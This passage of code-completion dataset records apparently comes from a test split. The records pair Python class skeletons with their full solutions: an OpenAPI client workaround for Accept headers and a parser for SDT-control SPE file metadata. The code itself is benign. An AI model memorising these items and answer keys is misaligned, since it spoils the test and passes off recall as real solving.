self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "class_docstring": "Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.", "class_name": "CustomDataApi", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000210", "length_bytes": 15066, "license_type": "permissive", "methods": [{"docstring": "Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "name": "workspace_file_details_with_http_info", "signature": "def workspace_file_details_with_http_info(self, wid, uuid, **kwargs)"}, {"docstring": "Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "name": "public_file_details_with_http_info", "signature": "def public_file_details_with_http_info(self, uuid, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002986", "prompt": "Implement the Python class `CustomDataApi` described below.\n\nClass description:\nCustom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\n\nMethod signatures and docstrings:\n- def workspace_file_details_with_http_info(self, wid, uuid, **kwargs): Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n- def public_file_details_with_http_info(self, uuid, **kwargs): Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "prompted_full_text": "Implement the Python class `CustomDataApi` described below.\n\nClass description:\nCustom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\n\nMethod signatures and docstrings:\n- def workspace_file_details_with_http_info(self, wid, uuid, **kwargs): Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n- def public_file_details_with_http_info(self, uuid, **kwargs): Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n\n<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "revision_id": "ae6b38baff7c695e2a01bf83d3eff48543bd7f57", "skeleton": "<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n", "source": "the_stack_v2_python_sparse", "source_path": "quetzal/client/base.py", "source_repo": "quetz-al/quetzal-client", "split": "test", "star_events_count": 2} {"blob_id": "7d10070dfcb460bc2f4be5b053b6bf7388e59914", "bodies": ["if comments[4][70:76] != 'COMVER':\n return (-1, -1)\ntry:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\nexcept ValueError:\n return (-1, -1)", "sdt_md = {}\nfor minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\nif version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\ncomment = comments[0] + comments[2]\nsdt_md['comment'] = comment.strip()\nreturn sdt_md", "try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\nexcept Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')", "comver = __class__.get_comment_version(meta['comments'])\nif any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\nsdt_meta = __class__.parse_comments(meta['comments'], comver)\nmeta.pop('comments')\nmeta.update(sdt_meta)\ndt = __class__.get_datetime(meta['date'], meta['time_local'])\nif dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\nsp4 = meta['spare_4']\ntry:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\nexcept UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\nmeta.pop('time_utc')\nmeta.pop('exposure_sec')"], "bodies_text": "<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "class_docstring": "Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.", "class_name": "SDTControlSpec", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000211", "length_bytes": 32172, "license_type": "permissive", "methods": [{"docstring": "Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.", "name": "get_comment_version", "signature": "def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]"}, {"docstring": "Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata", "name": "parse_comments", "signature": "def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]"}, {"docstring": "Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.", "name": "get_datetime", "signature": "def get_datetime(date: str, time: str) -> Union[datetime, None]"}, {"docstring": "Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.", "name": "extract_metadata", "signature": "def extract_metadata(meta: Mapping, char_encoding: str='latin1')"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_test_000056", "prompt": "Implement the Python class `SDTControlSpec` described below.\n\nClass description:\nExtract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\n\nMethod signatures and docstrings:\n- def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]: Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\n- def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]: Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\n- def get_datetime(date: str, time: str) -> Union[datetime, None]: Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\n- def extract_metadata(meta: Mapping, char_encoding: str='latin1'): Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.", "prompted_full_text": "Implement the Python class `SDTControlSpec` described below.\n\nClass description:\nExtract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\n\nMethod signatures and docstrings:\n- def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]: Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\n- def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]: Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\n- def get_datetime(date: str, time: str) -> Union[datetime, None]: Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\n- def extract_metadata(meta: Mapping, char_encoding: str='latin1'): Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\n\n<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n<|end_body_0|>\n\n<|body_start_1|>\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n<|end_body_2|>\n\n<|body_start_3|>\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n<|end_body_3|>\n", "revision_id": "a0091371dd42442ca3fae0fc0e8a4f0925757ac7", "skeleton": "<|skeleton|>\nclass SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see 